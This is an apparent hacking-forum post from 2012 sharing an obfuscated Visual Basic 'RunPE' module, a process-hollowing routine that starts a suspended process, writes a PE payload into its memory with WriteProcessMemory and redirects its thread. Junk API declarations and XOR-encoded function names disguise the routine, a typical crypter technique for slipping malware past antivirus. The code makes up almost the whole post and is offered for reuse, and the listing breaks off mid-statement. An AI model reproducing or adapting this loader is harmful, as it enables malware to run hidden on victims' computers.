
Runpe Mod K4


K4RUN4

« on: October 11, 2012, 05:04:34 pm »
Runpe Generator skyweb007
Code: Visual Basic
  1. Private Const iTODXOFScMLkMiuJqI As Long = 884210437
  2. Private Const oHlUFbB7c As Long = &H10007
  3. Private Const KPoPaUmjGcBsoBRgCp As Long = 43885802
  4.  
  5. Private Const UdpSlRoHgHSMeNkUek As Long = 571456721
  6. Private Const XkLbWZwT0 As Integer = 260
  7. Private Const BvJabvwHeMpFlrLTJo As Long = 666743405
  8.  
  9. Private Const UZKDKoCBRUXPnDyfOQ As Long = 623572428
  10. Private Const bTQl9oDeY As Long = &H4
  11. Private Const rtZtAIvclmkpNTaFSR As Long = 667513285
  12.  
  13. Private Const PSKiMqoWLfWMakTTGH As Long = 670505035
  14. Private Const E4r2NPXmu As Long = &H1000
  15. Private Const gfkVOVAaMcfiacHqmb As Long = 865706641
  16.  
  17. Private Const kFYSInvwyBlelQdcsy As Long = 73541772
  18. Private Const EQIAtwHT0 As Long = &H2000
  19. Private Const NPHgynYGIcFKYUDQpp As Long = 346262605
  20.  
  21. Private Const PAHOeFFULNFeHljRGa As Long = 314522005
  22. Private Const mvUSFCqYB As Long = &H40
  23. Private Const qhYmvfeSFfCOcKbOSr As Long = 554761501
  24.  
  25.  
  26. Private Declare Function FOZTxMgzSNCirs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  27. Private Declare Function gZhKYQnrtlK Lib "winmm.dll" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
  28. Private Declare Function CkmGjoCMhviUvRQtar Lib "gdi32" (ByVal hDC As Long) As Long
  29. Private Declare Function HitnFCZ Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  30. Private Declare Function LHTkzUIRpkNPwQVeSzH Lib "gdi32" (ByVal hMetaFile As Long) As Long
  31. Private Declare Function CreateProcessA Lib "kernel32" (ByVal Td57zdeAJ As String, ByVal irp2fgyco As String, ByVal RdLggVr0Q As Long, ByVal Fjn88KRAm As Long, ByVal VKa5eOX4s As Long, ByVal heV8nTQUC As Long, ByVal ofKb6Slk8 As Long, ByVal MCJpy2ujw As Long, jvQsfC7ZK As HvWIgrbaI, OpDxItsdy As Ikr1WTQJc) As Long
  32. Private Declare Function LjqxbonDHKBbqjS Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  33. Private Declare Function YAESOxLllLUhJd Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
  34. Private Declare Function yYyJDVF Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  35. Private Declare Function VcYkAPQZiFAegMSm Lib "USER32" (ByVal hCursor As Long) As Long
  36. Private Declare Function PKLJOzGN Lib "gdi32" (ByVal hMetaFile As Long) As Long
  37. Private Declare Function ETJMEdGljQFaQH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  38.  
  39. Private Declare Function BdlxatZwObOMG Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  40. Private Declare Function scnspARSopyQDhwdjCK Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  41. Private Declare Function bcafPI Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
  42. Private Declare Function UGQbdUuQBmh Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  43. Private Declare Function hYlwfeRDfB Lib "winmm.dll" () As Long
  44. Private Declare Function JbMQr Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  45. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal CE9yvfJTt As Long, b5IFtuNEU As Any, jJge24yxK As Any, ByVal U3W2edK9C As Long, fjly1tZq8 As Long) As Long
  46. Private Declare Function QpmIfD Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  47. Private Declare Function QTjEFOZTxMgzSN Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
  48. Private Declare Function rsqvgZh Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
  49. Private Declare Function QnrtlKaRCkmGjoCMhviU Lib "gdi32" (ByVal hDC As Long) As Long
  50. Private Declare Function QtareiHitnFCZvTLHT Lib "gdi32" (ByVal hGDIObj As Long) As Long
  51.  
  52. Private Declare Function KFjlRlrzo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  53. Private Declare Function echEKR Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
  54. Private Declare Function IZdfQwLDoVYsUank Lib "USER32" (ByVal hCursor As Long) As Long
  55. Private Declare Function FFhpCey Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  56. Private Declare Function TtTfZraxhrxtF Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  57. Private Declare Function suDbVzBi Lib "winmm.dll" () As Long
  58. Private Declare Function WSkaKIVom Lib "kernel32" Alias "OutputDebugStringA" (ByVal cgRmc7IJv As String) As Long
  59. Private Declare Function PEkggfkUbjzaZpf Lib "winmm.dll" (ByVal hMixer As Long) As Long
  60. Private Declare Function ycGEm Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
  61. Private Declare Function lcqAjjVQxGS Lib "gdi32" (ByVal hDC As Long) As Long
  62. Private Declare Function tRkvkhbtqNxHNJVmn Lib "gdi32" (ByVal hMetaFile As Long) As Long
  63.  
  64.  
  65. Private Declare Function etagzHxdYYQcM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  66. Private Declare Function rRDTQaRqTyieSneUi Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
  67. Private Declare Function bOAcy Lib "gdi32" (ByVal hDC As Long) As Long
  68. Private Declare Function GYJNocaTmjFbzFBNQgBC Lib "gdi32" (ByVal hDC As Long) As Long
  69. Private Declare Function QuJcwPKzfopnsdVdHUT Lib "USER32" (ByVal hCursor As Long) As Long
  70. Private Declare Function qiHVOzhjD Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  71. Public Declare Sub RtlMoveMemory Lib "kernel32" (AxGGLYZ7E As Any, d2l6uk0Pt As Any, ByVal l1p6nLoNB As Long)
  72. Private Declare Function yJerfQsO Lib "winmm.dll" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
  73. Private Declare Function QoaeEfqkC Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  74. Private Declare Function sQIEPhwRFOmhKMtMSbP Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  75. Private Declare Function FDIgmuYlkAEGyY Lib "gdi32" (ByVal hGDIObj As Long) As Long
  76. Private Declare Function PxzTwB Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  77.  
  78. Private Declare Function CemzbuayPqQcV Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  79. Private Declare Function tdouqBSipqAYSwyelEMB Lib "winmm.dll" (ByVal hMixer As Long) As Long
  80. Private Declare Function dbgRY Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
  81. Private Declare Function QVmcfQvYDBj Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  82. Private Declare Function iZnxggSSuC Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  83. Private Declare Function CallWindowProcA Lib "USER32" (ByVal Tg75MhFRu As Long, ByVal gEdEnMOb8 As Long, ByVal EmFxf7Lra As Long, ByVal TNZRPnQNL As Long, ByVal wZ1lfnc1U As Long) As Long
  84. Private Declare Function LqOgsheYqn Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
  85. Private Declare Function EKGSjkFHQoU Lib "gdi32" (ByVal hDC As Long) As Long
  86. Private Declare Function vBUdRxttswibiMnZo Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  87. Private Declare Function nLpTDzoIypD Lib "gdi32" (ByVal hColorSpace As Long) As Long
  88.  
  89. Private Declare Function ZvHVDUGKlZVP Lib "gdi32" (ByVal hDC As Long) As Long
  90. Private Declare Function CYwCyK Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  91. Private Declare Function xzISN Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  92. Private Declare Function ZtMGwcllkpaSaER Lib "winmm.dll" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
  93. Private Declare Function knfDSLv Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  94. Private Declare Function AdivFbo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  95. Private Declare Function GetProcAddress Lib "kernel32" (ByVal qkrvtMeXS As Long, ByVal Sa39iyURB As String) As Long
  96. Private Declare Function pLKmTlQbBbnhywSoM Lib "USER32" (ByVal hCursor As Long) As Long
  97. Private Declare Function MetOBLjeHJpJO Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  98. Private Declare Function sBCAFdjqUihxADvUj Lib "winmm.dll" (ByVal uPeriod As Long) As Long
  99. Private Declare Function uwQtyLIrEeeFNbCQ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  100. Private Declare Function rRsDx Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long
  101.  
  102. Private Declare Function VRduJQSczuYaGMgodI Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  103. Private Declare Function DHtzGYyxNDGyQA Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  104. Private Declare Function KzTJAO Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
  105. Private Declare Function HuuVfrSnRqITIFz Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
  106. Private Declare Function mVgmiuKLhjsPxaqQd Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  107. Private Declare Function LoadLibraryA Lib "kernel32" (ByVal SCgYSjXPN As String) As Long
  108. Private Declare Function tZUUTZJCJoOAQT Lib "USER32" (ByVal hCursor As Long) As Long
  109. Private Declare Function nQvfbPkbQfpYYKxZv Lib "winmm.dll" () As Long
  110. Private Declare Function DUGKlZVPifCYwCyKNcx Lib "USER32" (ByVal hIcon As Long) As Long
  111. Private Declare Function SNrGZtMGwcllkpa Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  112.  
  113.  
  114. Private ihwBEyUjcMuvRtMWrF As Long
  115. Private eGcbDkCnrSrDvPNjFd As Double
  116. Private SdWlHtEbWACiCIQFkt As String
  117. Private swVbiNaZptynNcUFmo As Byte
  118. Private Type tX1G1gc6e
  119. nLength As Long
  120. lpSecurityDescriptor As Long
  121. bInheritHandle As Long
  122. End Type
  123.  
  124. Private BjvWWwGTuPtSjKkypI As Long
  125. Private OwIOKWmCJLUrmQSFYg As Double
  126. Private BvvyAlrAQqpGyqPsXV As Boolean
  127. Private rMCsHRAAmnOXjMfKiB As Currency
  128. Private BwrKHeOYeamDEZbkIp As Date
  129. Private iPVovlSNNMRCuCgHsJ As Currency
  130. Private Type HvWIgrbaI
  131. cb As Long
  132. lpReserved As Long
  133. lpDesktop As Long
  134. lpTitle As Long
  135. dwX As Long
  136. dwY As Long
  137. dwXSize As Long
  138. dwYSize As Long
  139. dwXCountChars As Long
  140. dwYCountChars As Long
  141. dwFillAttribute As Long
  142. dwFlags As Long
  143. wShowWindow As Integer
  144. cbReserved2 As Integer
  145. lpReserved2 As Long
  146. hStdInput As Long
  147. hStdOutput As Long
  148. hStdError As Long
  149. End Type
  150.  
  151. Private eJsodwnesDllYLmIVj As Date
  152. Private iUYwmjdysQlKQMYbpL As Currency
  153. Private WgaEUmHaUKpwCngnSe As Integer
  154. Private uwBsRgZJqtOquJToCo As Integer
  155. Private Type Ikr1WTQJc
  156. CE9yvfJTt As Long
  157. hThread As Long
  158. dwProcessId As Long
  159. dwThreadID As Long
  160. End Type
  161.  
  162. Private bJaMQqQbVnkIdCuqCT As Single
  163. Private DqBYTvweEMChqqpuRY As Integer
  164. Private KXWmpskJYRBjlGinBw As Integer
  165. Private tTTuDQrLqPgHhsmFnK As String
  166. Private FLHSjGHRojNPuCVcSw As String
  167. Private Type rVuaHnLLV
  168. ControlWord As Long
  169. StatusWord As Long
  170. TagWord As Long
  171. ErrorOffset As Long
  172. ErrorSelector As Long
  173. DataOffset As Long
  174. DataSelector As Long
  175. RegisterArea(1 To 80) As Byte
  176. Cr0NpxState As Long
  177. End Type
  178.  
  179. Private ioyNnmDsynMoUSAoJp As Double
  180. Private jSRFFgoBdvcBSeSQKc As Double
  181. Private yfqvsEVWrsDaHkAgnG As Currency
  182. Private EjefdiTNUwZKaehYwa As Byte
  183. Private plZukbpAiiVIiFSgNf As Date
  184. Private VujgaspMiHNJUXmIJT As Integer
  185. Private Type vQYh9rmTo
  186. ContextFlags As Long
  187.  
  188. Dr0 As Long
  189. Dr1 As Long
  190. Dr2 As Long
  191. Dr3 As Long
  192. Dr6 As Long
  193. Dr7 As Long
  194.  
  195. FloatSave As rVuaHnLLV
  196. SegGs As Long
  197. SegFs As Long
  198. SegEs As Long
  199. SegDs As Long
  200. Edi As Long
  201. Esi As Long
  202. Ebx As Long
  203. Edx As Long
  204. Ecx As Long
  205. Eax As Long
  206. Ebp As Long
  207. Eip As Long
  208. SegCs As Long
  209. EFlags As Long
  210. Esp As Long
  211. SegSs As Long
  212. End Type
  213.  
  214. Private jEXRHmuytkdkPbbquw As Long
  215. Private OdWGnqLnrGQllYAVUv As Integer
  216. Private yhlLlvqJGdXPMXoDYM As Double
  217. Private tnRTAUZhXDMMLPmtBf As Long
  218. Private rHLOGetmWEHbEIWTCP As Long
  219. Private oQYkNgMjCbCNHZJfPa As Integer
  220. Private Type IG4wyJbPZ
  221. e_magic As Integer
  222. e_cblp As Integer
  223. e_cp As Integer
  224. e_crlc As Integer
  225. e_cparhdr As Integer
  226. e_minalloc As Integer
  227. e_maxalloc As Integer
  228. e_ss As Integer
  229. e_sp As Integer
  230. e_csum As Integer
  231. e_ip As Integer
  232. e_cs As Integer
  233. e_lfarlc As Integer
  234. e_ovno As Integer
  235. e_res(0 To 3) As Integer
  236. e_oemid As Integer
  237. e_oeminfo As Integer
  238. e_res2(0 To 9) As Integer
  239. e_lfanew As Long
  240. End Type
  241.  
  242. Private uDEOlgKLrwRZPupqot As Integer
  243. Private lsJkjAprjJlQOvkGym As Boolean
  244. Private LttggIQdFYEctGtrlE As Boolean
  245. Private XHSYUfvwTUeCiMbIPh As Long
  246. Private Type yDQ4fPIlY
  247. Machine As Integer
  248. NumberOfSections As Integer
  249. TimeDateStamp As Long
  250. PointerToSymbolTable As Long
  251. NumberOfSymbols As Long
  252. SizeOfOptionalHeader As Integer
  253. characteristics As Integer
  254. End Type
  255.  
  256. Private DBGqkrVvhwCFyVwdNJ As String
  257. Private SINXGGsfGcpEkDosSH As Boolean
  258. Private wQNjGekgruKfgqAuYo As Byte
  259. Private buoeKSTRWIBImOSVNl As Boolean
  260. Private tdLOiLPdnJWJyXsrUC As Date
  261. Private Type opSQywttF
  262. VirtualAddress As Long
  263. Size As Long
  264. End Type
  265.  
  266. Private JUOgdBWumiuMayjsRL As Long
  267. Private qXrvFuajjimKRYDPPe As Single
  268. Private ldCRKtbebftqZmMMny As Byte
  269. Private kEjHZZkevgDmwDALcq As Boolean
  270. Private Type nOr6mWzig
  271. Magic As Integer
  272. MajorLinkerVersion As Byte
  273. MinorLinkerVersion As Byte
  274. SizeOfCode As Long
  275. SizeOfInitializedData As Long
  276. SizeOfUnitializedData As Long
  277. AddressOfEntryPoint As Long
  278. BaseOfCode As Long
  279. BaseOfData As Long
  280. ImageBase As Long
  281. SectionAlignment As Long
  282. FileAlignment As Long
  283. MajorOperatingSystemVersion As Integer
  284. MinorOperatingSystemVersion As Integer
  285. MajorImageVersion As Integer
  286. MinorImageVersion As Integer
  287. MajorSubsystemVersion As Integer
  288. MinorSubsystemVersion As Integer
  289. W32VersionValue As Long
  290. SizeOfImage As Long
  291. SizeOfHeaders As Long
  292. CheckSum As Long
  293. SubSystem As Integer
  294. DllCharacteristics As Integer
  295. SizeOfStackReserve As Long
  296. SizeOfStackCommit As Long
  297. SizeOfHeapReserve As Long
  298. SizeOfHeapCommit As Long
  299. LoaderFlags As Long
  300. NumberOfRvaAndSizes As Long
  301. DataDirectory(0 To 15) As opSQywttF
  302. End Type
  303.  
  304. Private EhiPVovmSNOMRCJQgI As Byte
  305. Private XNPHgJnlUIdTKYiRRE As Byte
  306. Private fnBcybARdRPJbYuepy As Long
  307. Private DUVqrCZGjfmFNDidec As Single
  308. Private Type zHimHxdyE
  309. Signature As Long
  310. FileHeader As yDQ4fPIlY
  311. OptionalHeader As nOr6mWzig
  312. End Type
  313.  
  314. Private SteuBsSuZKGtOFyKUD As Boolean
  315. Private pcDZlAhlpPDBuNKgDb As Single
  316. Private dorHcdnvrVkEXqlaGP As Date
  317. Private OTEwFiyuLPRJiwpaIK As Integer
  318. Private Type guWZ6IUxp
  319. SecName As String * 8
  320. VirtualSize As Long
  321. VirtualAddress As Long
  322. SizeOfRawData As Long
  323. PointerToRawData As Long
  324. PointerToRelocations As Long
  325. PointerToLinenumbers As Long
  326. NumberOfRelocations As Integer
  327. NumberOfLinenumbers As Integer
  328. characteristics As Long
  329. End Type
  330.  
  331.  
  332. Public Function u7tGsr9W3(ByVal qOLqmwZVA As String, ByVal ACzbFfGhs As String, ParamArray TLEEGE3BB()) As Long
  333. Dim CUKQL As Long, zFt3quxBV(&HEC00& - 1) As Byte, HAB As Long, WMJGLUQ As Long
  334.  
  335. WMJGLUQ = GetProcAddress(LoadLibraryA(qOLqmwZVA), ACzbFfGhs)
  336. If WMJGLUQ = 0 Then Exit Function
  337.  
  338. CUKQL = VarPtr(zFt3quxBV(0))
  339. RtlMoveMemory ByVal CUKQL, &H59595958, &H4: CUKQL = CUKQL + 4
  340. RtlMoveMemory ByVal CUKQL, &H5059, &H2: CUKQL = CUKQL + 2
  341. For HAB = UBound(TLEEGE3BB) To 0 Step -1
  342. RtlMoveMemory ByVal CUKQL, &H68, &H1: CUKQL = CUKQL + 1
  343. RtlMoveMemory ByVal CUKQL, CLng(TLEEGE3BB(HAB)), &H4: CUKQL = CUKQL + 4
  344. Next
  345. RtlMoveMemory ByVal CUKQL, &HE8, &H1: CUKQL = CUKQL + 1
  346. RtlMoveMemory ByVal CUKQL, WMJGLUQ - CUKQL - 4, &H4: CUKQL = CUKQL + 4
  347. RtlMoveMemory ByVal CUKQL, &HC3, &H1: CUKQL = CUKQL + 1
  348. u7tGsr9W3 = CallWindowProcA(VarPtr(zFt3quxBV(0)), 0, 0, 0, 0)
  349. End Function
  350.  
  351. Public Function GCcQ9b7nT(ByVal iNLI3ostx As String, ByVal YIagFy1Sq As String) As String
  352. Dim DELHfVCj8 As Long
  353.  
  354. For DELHfVCj8 = 1 To Len(iNLI3ostx)
  355. GCcQ9b7nT = GCcQ9b7nT & Chr(Asc(Mid(YIagFy1Sq, IIf(DELHfVCj8 Mod Len(YIagFy1Sq) <> 0, DELHfVCj8 Mod Len(YIagFy1Sq), Len(YIagFy1Sq)), 1)) Xor Asc(Mid(iNLI3ostx, DELHfVCj8, 1)))
  356. Next DELHfVCj8
  357. End Function
  358.  
  359. Public Sub nJLJ0h51B(ByVal gAjHv5BEo As String, ByRef GelPTlshh() As Byte, LY7YFef3i As String)
  360. Dim Puq626fXT As Long, WcURpueyC As IG4wyJbPZ, dxNCenpxr As zHimHxdyE, VBzOQVQxf As guWZ6IUxp
  361. Dim ptLvXfllO As HvWIgrbaI, cQdlVdwtG As Ikr1WTQJc, sGbh6tdbF As vQYh9rmTo
  362.  
  363. ptLvXfllO.cb = Len(ptLvXfllO)
  364. RtlMoveMemory WcURpueyC, GelPTlshh(0), 64
  365. RtlMoveMemory dxNCenpxr, GelPTlshh(WcURpueyC.e_lfanew), 248
  366.  
  367. CreateProcessA gAjHv5BEo, kMIvzyLCQ(StrReverse(Chr$(41)), StrReverse(Chr$(57))) & LY7YFef3i, 0, 0, False, bTQl9oDeY, 0, 0, ptLvXfllO, cQdlVdwtG
  368. u7tGsr9W3 GCcQ9b7nT(Chr(56) & Chr(58) & Chr(40) & Chr(39) & Chr(35), kMIvzyLCQ(StrReverse(Chr$(92) & Chr$(72) _
  369.  & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) & Chr$(85) _
  370.  & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) & Chr$(78) _
  371.  & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) & Chr$(73) _
  372.  & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) & Chr$(80) _
  373.  & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  374. )))))))))))), GCcQ9b7nT(Chr(24) & Chr(58) & Chr(25) & Chr(37) & Chr(34) & Chr(34) & Chr(37) & Chr(14) & Chr(46) & Chr(53) & Chr(56) & Chr(10) & Chr(54) & Chr(29) & Chr(34) & Chr(33) & Chr(37) & Chr(34) & Chr(62) & Chr(57), kMIvzyLCQ(StrReverse(Chr$(92) _
  375.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  376.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  377.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  378.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  379.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  380. )))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase
  381. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  382.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  383.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  384.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  385.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  386.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  387. )))))))))))), GCcQ9b7nT(Chr(0) & Chr(39) & Chr(62) & Chr(63) & Chr(58) & Chr(34) & Chr(57) & Chr(25) & Chr(43) & Chr(60) & Chr(32) & Chr(38) & Chr(21) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  388.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  389.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  390.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  391.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  392.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  393. )))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase, dxNCenpxr.OptionalHeader.SizeOfImage, E4r2NPXmu Or EQIAtwHT0, mvUSFCqYB
  394. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase, GelPTlshh(0), dxNCenpxr.OptionalHeader.SizeOfHeaders, 0
  395.  
  396. For Puq626fXT = 0 To dxNCenpxr.FileHeader.NumberOfSections - 1
  397. RtlMoveMemory VBzOQVQxf, GelPTlshh(WcURpueyC.e_lfanew + 248 + 40 * Puq626fXT), Len(VBzOQVQxf)
  398. WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase + VBzOQVQxf.VirtualAddress, GelPTlshh(VBzOQVQxf.PointerToRawData), VBzOQVQxf.SizeOfRawData, 0
  399. Next Puq626fXT
  400.  
  401. sGbh6tdbF.ContextFlags = oHlUFbB7c
  402. u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
  403.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  404.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  405.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  406.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
  407.  & Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
  408. )))))))))))), GCcQ9b7nT(Chr(17) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
  409.  & Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
  410.  & Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
  411.  & Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
  412.  & Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
